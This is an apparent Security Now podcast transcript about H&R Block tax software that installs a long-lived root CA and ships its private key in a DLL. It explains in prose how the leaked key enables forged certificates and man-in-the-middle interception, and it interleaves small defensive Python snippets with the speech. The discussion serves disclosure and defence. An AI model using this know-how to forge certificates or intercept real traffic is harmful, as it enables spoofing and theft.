SN 1071: Bucketsquatting - Meta and TikTok's Tracking Pixels
Security Now (Audio) | March 25, 2026
Episode 1071 | 2:47:44 | 153.65 MB


When convenience trumps caution, disaster waits in the wings. Join Steve Gibson and Mikah Sargent as they break down the jaw-dropping oversights lurking in mission-critical tax and cloud tools, and examine how a single unchecked decision can upend internet security for years.

  • H&R Block's tax software does something SO WRONG.
  • The Intoxalock breathalyzer calibration cyber attack.
  • Firefox now offers a 100% free built-in VPN.
  • TikTok and Meta's tracking pixels are so much more.
  • Russians beg for the return of Telegram, WhatsApp, and others.
  • Never connect your crypto-wallet to an unknown service.
  • What would a week be without a Cisco CVSS of 10.0?
  • Ubiquiti patches a 10.0 critical flaw.
  • Listener feedback and...
  • What's "Bucketsquatting" and what can be done to prevent it?

Show Notes - https://www.grc.com/sn/SN-1071-Notes.pdf

Hosts: Steve Gibson and Mikah Sargent

Download or subscribe to Security Now at https://twit.tv/shows/security-now.

You can submit a question to Security Now at the GRC Feedback Page.

For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written, SpinRite 6.

Join Club TWiT for Ad-Free Podcasts!
Support what you love and get ad-free audio and video feeds, a members-only Discord, and exclusive content. Join today: https://twit.tv/clubtwit

Sponsors:


[00:00:00] Coming up on Security Now, Steve Gibson is here and I am filling in for Leo Laporte. We kick off the show with H&R Block's tax software. Well, it's doing something pretty wild and Steve has a suggested fix for it. We also talk about what happens when breathalyzer firmware needs to be calibrated. Plus, Russians want Telegram and WhatsApp to return to Russia. And very important, we finally look at the bottom of the screen.

[00:00:30] We'll learn what bucket squatting means and what can be done to fix it. All of that plus so much more coming up on Security Now. Podcasts you love. From people you trust. This is TWIT.

[00:00:50] This is Security Now, Episode 1071 with Steve Gibson and me, Mikah Sargent. Recorded Tuesday, March 24th, 2026. Bucketsquatting. It's time for Security Now. And if you're hearing this voice and going, that's not Leo Laporte, well, good for you. You've got a good ear for voices. I am Mikah Sargent.

[00:01:11] Leo Laporte is not here with us this week. He'll be back. Don't you worry. But until then, I am excited to be joined by the ever knowledgeable Steve Gibson. Hello, Steve.

[00:01:25] Mikah, great to be with you again. Leo told us last week that the RSA conference is going on in San Francisco. And so he and Lisa are there shaking hands with past and present and maybe even future advertisers for security related things. So glad to have you filling in for him. It's always a pleasure to get to join you.

[00:01:51] Well, yeah. And, you know, once upon a time when we had Father Robert, he was our backstop for Leo. And now we got you. So that's great. Yeah. Good to be here. Now, good. Go. I was just going to say this is Security Now episode 1071 for March 24th, 2026. Two days as it happens before my 71st birthday.

[00:02:17] So, wow. Yeah, I feel great. So good. Happy early birthday. We'll be at Security Now episode 2000 before very much longer. Today's episode is titled Bucketsquatting.

[00:02:36] And this has nothing to do with like something you have to do when you're camping. This is about an interesting problem that Amazon has had for years, which it turns out represents a surprisingly serious security vulnerability, which we're going to cover in detail. But, wow, there's a bunch of other really cool things that have happened in the last week.

[00:03:06] It turns out that H&R Block's tax software, I think they call it the Enterprise 2025 tax stuff, is doing something that is so very wrong.

[00:03:21] Also, a cyber attack has hit a company called Intoxalock, which provides breathalyzers to enable the ignition systems on automobiles whose drivers need to prove their sobriety before driving. That's an interesting story. We've also got Firefox now as of today.

[00:03:45] We should be at Firefox 149 as of today, offering a free built-in VPN. Also, TikTok and Meta's tracking pixels turn out to be doing much more than we believed. Russian citizens are begging to get their instant messaging back with, you know, Telegram, WhatsApp and so forth, to which the Russian government has said, no, no messaging for you.

[00:04:14] We've also got yet another example of the lack of wisdom of connecting your crypto wallet to an unknown service. And what would a Security Now podcast be if we didn't have a Cisco CVSS of ten point zero? Yes, you're just getting them confused at this point because there's so many of them. But Cisco is not alone. Ubiquiti also had a ten point zero CVSS critical flaw that needs to get patched.

[00:04:42] We've got some interesting listener feedback. And then what is exactly bucket squatting and what can be done to prevent it? So, you know, maybe we have some things to talk about this week. I don't know. Sounds like it. So look, maybe a few things to talk about. I'm looking forward to learning about bucket squatting. I'll tell you that. You know, it's a good exercise move. Surely works on the thighs. That's true. Strengthen those whatevers.

[00:05:13] Yeah, exactly. The whatevers. But as you all know, this is the time where after our wonderful summary of what's to come, we take a moment to cut to an ad break. And Leo will be here for you for that. Hi, Leo. Hi, Micah. Hi, Steve. Sorry I couldn't be here. I'm at RSA right now having a great time, I'm sure. But I did want to come back and tell you about our sponsor for this episode of Security Now,

[00:05:42] Hoxhunt. Actually, I'm meeting with them at RSA in just a little bit. As a security leader, you've been there. The eye rolls during training: you're making us do this. The one-size-fits-all phishing simulations that your employees spot a mile away. They don't learn anything from that. And that report button that gets ignored more often than not. Your programs are running, but it's not changing employee behavior. And isn't that what it's all about?

[00:06:09] Meanwhile, AI is making real attacks more convincing by the day. And leadership is starting to ask the question you don't have a clear answer to. Is this actually working? Well, Hoxhunt is built to answer that. Hoxhunt empowers your employees to spot and stop phishing attacks. It drives measurable behavior change. And it does it in a fun way through personalized, gamified micro training. No more eye rolls.

[00:06:37] It's just engaging and fun. And it's how people learn. It's powered by AI and behavioral science. And you'll love it as an admin because Hoxhunt does all the heavy lifting. The simulations run automatically, and not just email. These days, it's got to be everywhere. They run in email, in Slack, and in Teams. It's like real phishing attacks personalized to each employee based on role, location, and behavior.

[00:07:02] Every simulation uses AI to mirror those real world attacks, meaning employees are tested on what's actually getting through. Not outdated templates they recognize immediately. No messages from Nigerian princes. They know better than that now. Gamified training keeps engagement high without feeling punitive. Your employees will love it. And you'll love it too. And because every interaction generates a coaching moment, you're not just tracking completion.

[00:07:31] You're building behavioral indicators that tell a real story. You get reporting rates, repeat clicker reduction, and time to report. The kind of metrics that hold up when leadership asks the hard questions. You could say, yeah, got it right here. You don't have to take my word for it. With over 3,500 verified reviews on G2, Hoxhunt is the top-rated security training platform. Recognized for best results and easiest to use.

[00:07:59] It's also recognized as a customer's choice by Gartner. And thousands of companies, Qualcomm, DocuSign, Nokia among them, trust Hoxhunt to train millions of employees worldwide. Visit hoxhunt.com/securitynow today to learn why modern secure companies are making the switch to Hoxhunt. That's hoxhunt.com/securitynow. Now back to the show. All right. Thank you, Leo, for that.

[00:08:29] Let us get into the show. The good stuff. So, um, last week we, I showed this picture, same picture that we have here, but with a different caption. I, I thought this picture was so bizarre that I would just put it out to our listeners to say, give me an idea for a caption. Uh, and so that was the, that, that was a caption contest last week.

[00:08:56] Um, I got flooded with a huge range of very fun and creative bits of feedback. I settled on one, which I like because clearly what we're seeing here with this insane communications pole, telephone pole, power pole, whatever the hell it is. It's beautiful. It's beautiful.

[00:09:23] This, this demonstrates like what, 50 years of accumulation. Clearly this did not happen in a day, right? Initially, when that pole was erected and the first lines were run to it, I'm sure down there in the core, very deeply, is what was there originally. Beautiful, probably made sense. You could take a look at it and see what was going on with everything.

[00:09:51] You know, you, it was like, it was perfect then like, Oh, but wait a minute. We need to add another trunk line. So, okay. Tack that onto the side and, and wire it in. And then who knows how many decades pass and you end up with what could, you know, affectionately be called a rat's nest of wires. So I gave it. It's a, it's a rat King's nest.

[00:10:17] You know, yeah, I gave, and then there's some poor worker guy up there on the top, like trying to add just one more wire. I just need one more wire! Anyway, so I gave this thing the caption, a contemporary visualization of the Microsoft Windows code base. This is the caption you added. Yes. That's my caption. It's beautiful, Steve. I read that and I thought, yes, yes.

[00:10:47] Oh, I think that. And I mean, that's what we see with windows, right? I mean, and in all fairness, it's not just windows. It's any old code base that has been evolving over time where you can't really throw away the old code because it's working and things depend upon it being the way it is. So we're just going to add to it. We're going to, you know, you know, and we've got, you know, windows now has multiple APIs.

[00:11:17] I hear Paul Thurrott talking about how, you know, oh, nobody codes to that API anymore. Well, of course I do, but not, you know, other normal coders. So anyway, I thought this was a great caption. And it's a variation on an idea that I got from one of our listeners. So thank you for that. And thank you, everyone, for sharing your ideas. Okay.

[00:11:41] So this first goodie is where we're going to spend some time this morning, or this podcast, because there's a lot here to unpack. And I really think our listeners are going to find this interesting. Credit for the first mention goes to a listener, Jack Christensen, who first pointed me at this.

[00:12:08] Since then, the Hacker News and other security outlets have picked up on this and shared it. Jack provided a note which included a link to the original Y Combinator posting, whose Chinese author is a guy named Yifan Lu, Y-I-F-A-N, last name Lu, L-U.

[00:12:38] He appears to know his way around TLS and web servers, as we will see. So here's what Yifan posted to Y Combinator last week. He said, just a PSA, and we know that stands for public service announcement, for folks here in the U.S. because tax season is coming up and some of you may be using, Business, not Enterprise, H&R Block Business 2025.

[00:13:06] He said, and get a load of this, folks, I discovered, he wrote, that the software installs a root CA named WK ATX Server Host 2024.

[00:13:25] So a root certificate authority, WK ATX Server Host 2024, with an expiration in 2049. Yes, 23 years from now. He said, into your local machine's trusted root certificate store.

[00:13:50] They also helpfully include the private key to this certificate in a DLL file. He says this certificate does not identify itself as H&R block anywhere and does not get uninstalled when you uninstall the software.

[00:14:13] He said, I've been able to successfully use this root CA plus MITM proxy, which is a software package, man in the middle proxy, to manipulate TLS traffic on a brand new virtual machine on the same network with a DNS spoofing attack. And he gives us then a link in his posting to a YouTube video. And I've got the link in the show notes for anyone who's interested.

[00:14:42] He said, to test if your machine is vulnerable, visit this page. And now we have a URL to a host on his domain. It's https://hrbackdoor.yifanlu.com, HR as in, you know, H&R Block.

[00:15:10] So this is a TLS, a secure HTTPS secure connection to a web server on his domain that is carrying a certificate he made using this root CA that was installed in everyone's machine who has H&R block business 2025.

[00:15:38] Thanks to the fact that they also provided the private key for this root certificate, which should never be there. Anyway, he says, go to this URL. And if you do not get any warning or error message from your browser, then you have the back door installed. Okay. Now it's not really a back door, I understand, but I think that's a popular term.

[00:16:06] It's frightening and scary as we'll see. Maybe, I don't get how this is a back door, but it's not a good door. You know, maybe a side door. He said, if your browser does complain, you can choose to visit the page anyway for more details on the vulnerability. And I did. And I'll tell you about what I found in a second.

[00:16:32] So he says, is it negligence or a real back door? It's impossible to tell. And since the private key is out there, anyone can use it. So the point is moot. There's no legitimate reason, he wrote, why they need to install a wildcard root CA under a different name. And boy, do I agree. As we'll see, I'm going to demonstrate how we don't need this.

[00:17:03] When I contacted them, and I'll be sharing the timeline of that later. When I contacted them about it, their statement includes, quote, similar findings have been identified through internal security assessments, unquote. He said, meaning they know about this issue, but have not fixed it. He said, I would not trust H&R Block software at this point.

[00:17:29] If you did not get bit by this, congratulations. He said, see this post as a reminder to audit your trusted root CA store. That is, in other words, take this post as a reminder to go take a look and see what cruft things may have installed behind your back for their own purposes. Because, unfortunately, as this demonstrates, that can happen.
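Windows users who want to act on that reminder programmatically could start with a minimal Python sketch like the one below. It relies only on the standard library's `ssl.enum_certificates`, which is Windows-only; the subject string searched for is an assumption based on the certificate name reported in this story, and a raw byte search of the DER blob is a crude first pass, not a proper X.509 parse.

```python
import ssl
import sys

def find_suspicious_roots(keyword: bytes = b"ATX Server Host"):
    """Scan the Windows trusted root store for certificates whose raw
    DER bytes contain a suspicious subject string. Returns [] on
    non-Windows platforms, where ssl.enum_certificates is unavailable."""
    if not sys.platform.startswith("win"):
        return []
    hits = []
    for der_bytes, encoding, trust in ssl.enum_certificates("ROOT"):
        # Subject names appear as printable strings inside the DER blob,
        # so a byte search works as a rough first-pass filter.
        if isinstance(der_bytes, bytes) and keyword in der_bytes:
            hits.append(der_bytes)
    return hits

if __name__ == "__main__":
    print(f"{len(find_suspicious_roots())} suspicious root certificate(s) found")
```

A hit would only tell you the store deserves a closer look with a real certificate viewer; it is not proof of compromise on its own.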

[00:17:58] And it's not good. Okay, so let's reverse engineer this to figure out what's going on here. First, again, I want to be very clear that having H&R Block install its own root certificate into the certificate authority root store of every single person who installs their tax preparation software. And then, I mean, that's bad enough.

[00:18:27] And then, even worse, to leave it there forever with an expiration date in the year 2049. And, you know, Mikah, I do think the podcast will probably not last that long. So, we're not going to be here to celebrate the expiration of the H&R Block root certificate. So, this will remain valid for the next 23 years.

[00:18:57] Doing that on H&R Block's part is the height of hubris and irresponsibility. Now, I don't want to ask for a spoiler. So, if you are going to talk about this, then you can just say that it'll be a spoiler. But I know that when it comes to the practically minded, particularly those in the security world, perhaps the motivation is not as important as the impact.

[00:19:23] But I would love to know, do you have any thoughts about why make this choice of a certificate that doesn't – is it just pure laziness? You talk about hubris and irresponsibility here. That just seems like, well, one would say, that's a choice. I mean, they made a choice. Yeah. And, in fact, I'm going to explain the dangers and then I'm going to explain the reason for it.

[00:19:52] And then we're going to show how the same thing could be achieved in a completely secure fashion. Excellent. So, I had a lot of fun with this because we've never, in the 21 years of the podcast, seen this and gone into it. So, it's a great opportunity to really dig in. Yes. Okay.

[00:20:15] So, remember that the way all this works is that a root certificate has signed itself and has declared itself to be a certificate authority certificate. Certificates have a whole bunch of things they can be labeled and they can also contain constraints on their own behavior.

[00:20:38] That is, constraints that they broadcast on what things they can be used for. So, this is an unconstrained certificate authority certificate, which is the most potent form of certificate you could have.

[00:20:57] So, just as with any root certificate authority certificate, the purpose of that certificate, that self-signed certificate, is to verify the signature of any other certificate that it might have signed using its matching private key. It contains the public key.

[00:21:20] So, its private key signs something which the root certificate's public key can be used to verify. So, it can verify, but it can't itself sign. That's the beauty of this public key, you know, division of labor between private and public keys. So, the CA's private key, consequently, like for DigiCert, right? They're a CA.

[00:21:46] Their private key is the most prized, protected, and safeguarded piece of information anywhere since any certificate which that super secret protected private key signs will be trusted anywhere that its matching CA certificate containing its matching public key is installed. Okay. Okay.
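That division of labor can be illustrated with a toy, textbook-sized RSA example. These numbers are purely illustrative (real keys are thousands of bits, and real signatures use padding schemes), but they show the asymmetry Steve describes: the private exponent produces the signature, and the public exponent, the part shipped inside the certificate, can only check it.

```python
import hashlib

# Textbook-sized RSA numbers (n = 61 * 53); real keys are far larger.
N, E, D = 3233, 17, 2753   # E is the public exponent, D the private one

def sign(message: bytes) -> int:
    # Only the holder of the private exponent D can produce this value.
    digest = int.from_bytes(hashlib.sha256(message).digest(), "big") % N
    return pow(digest, D, N)

def verify(message: bytes, signature: int) -> bool:
    # Anyone holding the public exponent E can check the signature.
    digest = int.from_bytes(hashlib.sha256(message).digest(), "big") % N
    return pow(signature, E, N) == digest

sig = sign(b"certificate body")
print(verify(b"certificate body", sig))            # True: signature checks out
print(verify(b"certificate body", (sig + 1) % N))  # False: forged signature
```

The same math is why leaking D, as happened here, lets anyone in the world produce signatures that every holder of the public key will accept.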

[00:22:16] So, keeping the private key secret is like so important. Did H&R Block at least keep its installed CA certificate's private key secret? Well, no. Yifan told us no. Not even a little bit.

[00:22:34] This intrepid researcher discovered the CA certificate's never-to-be-disclosed matching private key sitting comfortably in a DLL that was included as part of this software's installation.

[00:22:50] We can be certain that this is true since this researcher used the matching CA's private key, which he found in the DLL, to create and sign his own standard TLS web certificate just like a CA would, like a certificate authority, like DigiCert did, when GRC got its most recent certificate. That's what it does.

[00:23:19] So, he created a TLS web certificate using the private key that he found in the DLL in order to create that hrbackdoor.yifanlu.com website, which anybody who installed the H&R Block software can now go to because their machine, their browsers will all trust this certificate that he made for himself.

[00:23:48] When I went there, since I didn't install this H&R Block software, Firefox freaked out, as it should, warned me that the site was attempting to use an untrusted certificate signed by an unknown issuer and that I should proceed no further. I put the dialogue box in the show notes. This is from Firefox. It says, someone could be trying to impersonate the site and you should not continue.

[00:24:16] Websites prove their identity via certificates, writes Firefox. Firefox does not trust hrbackdoor.yifanlu.com because its certificate issuer is unknown, meaning to my computer. Firefox said the certificate is self-signed or the server is not sending the correct intermediate certificates. And so, then we get the error code, SEC_ERROR_UNKNOWN_ISSUER.

[00:24:46] And you have a link then. You can click on view certificate and see the certificate where we see that everything that Yifan Lu has told us is true. So, this is all exactly what we would want and expect from any browser. And it's what we should receive because, as I said, I never made the mistake of installing H&R Block's 2025 tax prep software.

[00:25:15] But what's significant is that anyone who has ever previously installed H&R Block's, you know, Business 2025 tax prep software, from now and for the next 23 years, while their purposefully installed CA root certificate remains valid, would not and does not receive any warning or notification.

[00:25:45] At all. Their web browser simply opens that page without complaining. Yifan Lu's, you know, self-cert-created page, because the signer of Yifan's demo test site certificate will now be known and trusted by their PC because once upon a time, maybe recently, maybe up to 23 years in the future,

[00:26:12] they had installed HR Block's software. Okay, so, so far this is all just happy demonstration test land, right? The reason Yifan has raised the alarm is that the inherent dangers extend far beyond testing.

[00:26:32] Since in addition to installing an untrusted, an untrustworthy certificate authority cert into every PC root store, as I said, and he's proven, H&R Block thoughtfully provided their CA's matching private key.

[00:26:49] Consequently, anyone, anywhere in the world can generate their own TLS web certificates or code signing certificates, any kind of certificate, because there's no constraint on the use of this, that will be trusted without question by any previous user of H&R Block's tax preparation software and for the next 23 years.

[00:27:15] For example, nothing prevents someone from signing a TLS certificate for www.google.com or update.microsoft.com or any other web domain they might choose.

[00:27:31] If traffic can then be rerouted to that maliciously named and now fully trusted server, anyone who had previously installed the H&R Block tax preparation software could be fully spoofed. Their browser would go to web pages at those URLs, they would see matching trusted certificates and be fully spoofed.

[00:28:00] Now, presumably, H&R Block has digitally signed their software, but any of their users who had previously installed their tax preparation software would also now be completely spoofable. Their customers' PCs would download and blindly trust any subsequent software from any source that was signed with a certificate that had been issued with their private key.

[00:28:30] The code signing certificate could say H&R Block or it could say Microsoft Corporation or anything else that fit the malicious need of the moment. Yifan also said in his original Y Combinator posting, he said,

[00:28:47] I've been able to successfully use this root CA and MITM proxy to manipulate TLS traffic on a brand new virtual machine on the same network with a DNS spoofing attack. So let's look at that. We've talked a lot about so-called middle boxes through the years.

[00:29:09] Many corporations use them to allow deliberate MITM, you know, man in the middle, interception in order to examine 100% of the traffic that's passing into and out of their networks.

[00:29:28] They want to protect their employees inside their protected perimeter from anything malicious cruising in to their network under the protection of TLS encryption. And they'd like to prevent corporate trade secrets from being sent out through their network, either inadvertently or deliberately, thanks to the same TLS encryption.

[00:29:56] So to accomplish this, every PC operating inside their corporate network environment must contain the root certificate for that middle box. In other words, a CA root certificate for that middle box. And we hope that its matching key is, you know, well-protected inside.

[00:30:21] The matching private key is not extractable. So having all PCs in the enterprise containing that middle box's root certificate, and with it having the matching private key, which it's careful never to let anybody else get, that allows the middle box to synthesize fake trusted remote website certificates on the fly.

[00:30:51] So here's how that works. Say that someone inside the enterprise attempts to go to chatgpt.com. The middle box will intercept that connection attempt, and it itself will go to chatgpt.com on behalf of the user to obtain ChatGPT's TLS certificate, as if it were a user connecting.

[00:31:19] It will duplicate many of the details of ChatGPT's certificate, but it will sign that new cloned certificate with its own internal private key. And it will then return that cloned certificate to the enterprise user, who will believe they've connected directly and privately to ChatGPT.

[00:31:46] Their browser will show www.openai.com or chatgpt.com or whatever the URL is. However, they've actually connected to their enterprise's middle box, which is masquerading as ChatGPT, which it can do because their PC contains that root CA for the middle box.

[00:32:12] Therefore, middle-box-created certificates are trusted inherently. Now, all of this may seem like a lot to go through, but it's the only thing that allows the enterprise to monitor the TLS encrypted communications of its employees to prevent them from, for example, uploading the company's 10-year product planning in order to ask ChatGPT what it thinks about those plans.

[00:32:40] Those should not leave the enterprise. So somebody needs to guard those communications.
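Here's a deliberately simplified model of the trust decision being described, not real X.509 validation (which cryptographically verifies signatures and chains), just the core logic of why a planted root plus a leaked private key means forged certificates for any site sail through:

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Cert:
    subject: str   # who the certificate claims to be
    issuer: str    # the CA that signed it

# The victim's trusted root store after installing the tax software:
trusted_roots = {"DigiCert Global Root", "WK ATX Server Host 2024"}

def browser_trusts(cert: Cert) -> bool:
    # Real browsers verify the issuer's signature cryptographically;
    # this model keeps only the resulting trust decision.
    return cert.issuer in trusted_roots

# Anyone with the leaked private key can mint this forgery:
forged = Cert(subject="www.google.com", issuer="WK ATX Server Host 2024")
print(browser_trusts(forged))  # True: accepted without any warning
```

The subject can be any domain at all, which is exactly the spoofing scenario Steve walks through next for Google and Microsoft update URLs.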

[00:32:48] Yifan's point about the installation of a root certificate and man in the middle proxy is that for reasons that are not at all clear, H&R Block has thereby, by doing what they've done, they've given themselves all of the same privileges and capabilities as any enterprise business.

[00:33:17] That's too much power. The question is why? That's too much power. Yes. They could intercept all of their customers' communications to any other website. Oh, my God. Why would you want that level? Yes. Why would you want the responsibility? Yeah, that's too much responsibility. Yeah. Thank you.

[00:33:43] The only reason H&R Block would need to include the private key that matches the CA root certificate they installed into their user's machines would be if they needed to create and sign TLS certificates on the fly that would be trusted by that user's machine.

[00:34:06] I don't see any other possible need for the private key being locally present as it is. So, again, why? Why give themselves the capability for wholesale, local machine, invasive traffic interception and decryption? And there

[00:34:34] doesn't appear to be any reason why tax preparation software would need anything like this. And even if we trust H&R Block and assume that they must have some justifiable basis for having given themselves this capability on every one of their customers' machines that have installed their software, as Yifan himself demonstrated, they will also have given anyone

[00:35:02] else, anyone else like him, this researcher who is aware of this, the same privileges since the CA root cert is installed and its matching private key is sitting in a DLL for anyone to extract and use. I mentioned at the top that we were going to reverse engineer this in an attempt to understand what's

[00:35:28] going on. I haven't seen this H&R Block software and I don't want to let it anywhere near any of my machines. Right. So I have not watched it work. But the only reason I can see that they would do this would be if their software installs and runs a local web server in their user's machine.

[00:35:58] This would allow them to have a fully web browser based user interface and a UI free headless web server that encapsulates all of their tax preparation logic. In other words, we go to Google Docs in order to use

[00:36:21] Google's document application, it would be possible to instead go to H&R Block software server with our browser running on our machine to use their tax prep application delivered to us by a server running

[00:36:44] locally. So clicking, for example, some sort of little startup app would invoke the Windows shell to launch the user's default web browser with a URL like https://127.0.0.1: and then like some port

[00:37:07] number, 1234 or some custom port number, whatever they wanted to use, you know, or they might have also tweaked the user's hosts file to map a more friendly looking domain name like hrblock-tax-prep.com, mapping that to the 127.0.0.1 IP. That way users would see something comforting in their web browser

[00:37:37] URL address bar. But none of that actually explains why they couldn't then just install a root CA and a certificate for that. There's no need to make it up on the fly. I mean, I'm giving them the benefit of every possible excuse here. Okay, so now the user clicks on the startup app, which launches their web

[00:38:04] browser, which accesses their locally running web server. That built-in local web server needs to present their browser with a TLS certificate that matches the address they've accessed. Again, 127.0.0.1 or hrblock-tax-prep.com or whatever. Whatever the case, that certificate needs to be trusted by the browser.
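For contrast, here's a sketch of how such a local server could terminate TLS the right way: it holds only a leaf certificate and that leaf's private key. The root's private key is never needed on the user's machine, because the root only ever signs the leaf once, at install time. The file names here are hypothetical placeholders, not anything H&R Block actually ships.

```python
import os
import ssl

def make_server_context(cert_file="leaf_cert.pem", key_file="leaf_key.pem"):
    """Build a server-side TLS context from leaf material only, or return
    None if the files are absent (as they are in this standalone sketch)."""
    if not (os.path.exists(cert_file) and os.path.exists(key_file)):
        return None
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.load_cert_chain(cert_file, key_file)  # leaf cert + leaf key, no CA key
    return ctx

if __name__ == "__main__":
    print(make_server_context())  # None here: no cert files in this sketch
```

A context built this way could be handed to any Python HTTPS server; the point is simply that the only private key it needs is the leaf's, which is exactly Steve's argument in the next paragraph.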

[00:38:27] This means that it must have been signed by the private key that matches the root CA certificate that H&R Block planted into every user's PC. Since the root certificate's subject name,

as Yifan told us, is "WK ATX Server Host 2024", okay, it seems unlikely that it would be, you know, used directly as the server's end certificate. That would be a weird string for users to see in their browser's URL bar. It's more likely that the installation process or perhaps, you know, maybe the first time

[00:39:14] you run the system, that it would create the built-in web server certificate, which it would then have signed using the root CA's private key, which we know is sitting in a DLL. And this is exactly, as I said, what Yifan Lu did when he created his test site. Once all this was done, the built-in web server would offer the user's

[00:39:42] browser this custom-minted TLS certificate, and it would use that certificate's private key, which the web server must have, to verify its valid ownership of the certificate it provided to the browser. The point I want to make here is that any web server that's accepting and terminating TLS connections does need to have

[00:40:11] the private key that matches the public key in the certificate which it provides to the web browser. But that should never be the private key for the CA root certificate. No one does that, right? The only thing the root signs is

[00:40:31] another certificate, which is then presented to the web browser. The root itself is never used directly. Thus, you never need its private key to be around. Okay, so when all this was revealed, when Yifan found all this, he did the right thing and reported his

[00:40:53] astonishment and concerns to H&R Block. The timeline of his interactions with them began on March 10th. So today's what, the 24th? So two weeks ago today, on the 10th, he disclosed to H&R Block through their responsible disclosure policy.

[00:41:16] Two days later, on March 12th, he was asked to, quote, please provide more details about how an attacker would realistically exploit this in practice, unquote, and, quote, share the video proof of concept from start to end, unquote. Three days later, on the 15th, he did that. He provided H&R Block with details and a proof of concept

[00:41:44] video, and told them the deadline for their response was March 20th, due to U.S. tax season coming up. On the 20th, he received the following statement back from H&R Block: After review with the program team, we're closing this report as out of scope. The reported issue involves an executable application

[00:42:12] that falls outside our defined program scope, and similar findings have been identified through internal security assessments. Okay, what? So like, yeah, we know. Really? So somebody actually explained this to you and you're like, eh,

[00:42:39] that's how it's supposed to work? Okay. So this is obviously pretty much a head-buried-in-the-sand response. They deserve to receive full scrutiny over this very wrongheaded design of their system, and I hope they receive it. There can be no doubt that the use of their tax

[00:43:01] preparation software leaves an uninvited, unwanted, and unconstrained root certificate, with a 23-year lifetime remaining and its known private key, sitting in the root store of every customer of their tax preparation software. And it persists even after their software has been uninstalled.

[00:43:32] Okay. Now, the one thing we've not examined is what I, Steve Gibson, would do if I were called, you know, or contracted to do this in a secure fashion. So Mikah, let's take a break, and then we're going to look at how to do this right. I am looking forward to hearing how we can do it right after seeing how you can do it so, so wrong,

[00:43:58] but let's take a break. Leo Laporte joining us for the next sponsor. Hi guys, real quick, this episode of Security Now brought to you by GuardSquare. Mobile apps today, well, you just listened to the show, you know they've become an inescapable part of life. We use them all the time, ranging from financial services to healthcare, retail, entertainment, and of course, users trust mobile apps with their sensitive personal data.

[00:44:27] But a recent survey showed that 72% of organizations experienced a mobile application security incident last year, and 92% of respondents reported rising threat levels over the last two years. Doesn't take a survey to know that, right? Now, if you're an app developer, you got to remember your users are trusting you and attackers want your users' personal data. So they're constantly

[00:44:51] finding new ways to attack your mobile app. This is one really awful thing they do: they reverse engineer it, easy now using AI. They'll repackage it. They'll distribute your app, modified, via phishing campaigns, via sideloading, by third-party app stores, any means necessary. And then your users get compromised, and who do they blame? They blame you. But by taking a proactive approach to mobile

[00:45:18] app security, you can stay one step ahead of these attacks and maintain the trust of your users. That's where GuardSquare comes in. GuardSquare delivers mobile app security without compromise, providing advanced protections for both Android and iOS apps, combined with automated mobile application security testing to find vulnerabilities, and real-time threat monitoring to gain insight into attacks. You're not helpless anymore. Discover more about how GuardSquare provides

[00:45:47] industry-leading security for your mobile apps at guardsquare.com. That's guardsquare.com. We thank them so much for supporting Security Now. And now back to Mikah and Steve. Guys? Thank you very much, Leo, for that. We are joined once again by Steve Gibson as we continue on with

[00:46:07] understanding what we would do if tasked with fixing things for H&R Block. Okay. So, first of all, let me reiterate that I'm trying to give these guys every benefit of the doubt. I don't understand why they've

[00:46:27] done this. The only real reason that I can imagine is actually traffic interception. They would need this in order to act like a middlebox to intercept encrypted communications.

[00:46:49] Maybe, and again, I've not seen the software, maybe they set themselves up and then their app says, okay, now go to irs.gov. Go to your bank's website. I mean, maybe there are remote cloud-based sources of information,

[00:47:10] which it asks you to look at while intercepting your communication, so that it can suck that stuff in and incorporate it into your tax preparation. I don't know. It's the only thing I can imagine, and it's still horrible. I mean, you don't want a proxy that's able to intercept all of your TLS

[00:47:34] connections installed on your machine, let alone left behind after you've uninstalled it. But that's the only thing I can imagine. And also, if all they wanted was to be able to run a local web server that your browser trusts, then they would need to install their own root cert, and the web

[00:48:03] server would then have a certificate that that root cert has signed. But there would never be the root cert's private key, because it wouldn't be necessary. And the only thing that certificate would do would be to authenticate a local web server. You know, web app developers do this all the time. They run a local web server on their machine. It's not a big deal. So H&R Block could have done that

[00:48:31] if that's all they needed to do, and it could have been safe. But say that for some reason they did need to deploy this on the fly. Even that could be done securely. And here's how. If I wished to deploy a product that included a built-in web server that a user's modern, fully secured web browser could interact with, without raising any warnings about insecure connections,

[00:49:00] lack of trust, self-signed certificates, and so on, it's possible. So H&R Block, are you listening? Upon installation, the installing software would first generate a state-of-the-art, standard 4096-bit public-private key pair. They would not ship that with the product. In other words,

[00:49:29] the thing H&R Block did was provide a public key in a root CA, with the private key bound into the DLL. So they shipped those statically, which means anyone who gets a copy of one has what they need for all H&R Block users, which is where the problem is. No, instead,

[00:49:56] generate it on the fly. Generate your own 4096-bit key pair on the fly, so that no two installations ever share the same keys. The public key half would be contained within, to your point, a short-lived root certificate, you know, having a lifetime of the expected duration of the product's

[00:50:24] use, maybe 90 or 120 days for tax preparation software. Mikah, as you pointed out, there's no reason for it to live any longer. Yeah, especially because people are going to install it again the next year, if they uninstall it or something. The theory is they're going to install it again and use it again next year. And since it's able to make a certificate, if it did expire, it could just make

[00:50:48] a new one. Yeah, the software itself could just bump this along forward, you know, always installing a few months' worth of root CA that will gracefully, properly expire after a few months. You'd like to have the uninstaller remove it, because you don't want to have all this crap accumulating in

[00:51:09] your users' root stores. But okay. In addition, it should tightly constrain the use of the certificate so that it can only ever be used to sign a TLS end certificate. Those are constraints that could be added to the CA. They didn't do that either. Okay. Next, it generates a second

[00:51:35] 4096-bit public-private key pair. It uses this second key pair to create the web server's local site certificate. That's the certificate the server will send to the user's local browser. And it would name it something like, you know, hrblock.localhost. That would be a safe name. .localhost is reserved

[00:52:03] for the local machine as a sort of localhost pseudo-domain. So hrblock.localhost, which would mean that certificate could never be misused in any useful fashion. It would only ever be able to serve and encrypt and authenticate TLS connections. In order for this local

[00:52:29] site certificate to be trusted on that local machine, it needs to be signed by the root certificate's private key, that first one that was made, you know, the one belonging to the just-created local root CA. And then here's what's crucial and cool: immediately after that root CA's private key is used to sign the local site

[00:52:57] certificate, that private key is securely overwritten and deleted. The point is, that private key is never written to non-volatile storage, so it is now permanently gone. And the locally installed root certificate can never be abused, because its matching private key, which is required for its abuse, no longer exists.

[00:53:26] It was ephemeral. It was transient. It's gone. Since its private key was only ever needed once, to sign the local certificate to prove that certificate's validity, it should never be retained. So the installation, in my solution, would then add an entry to the system's hosts file,

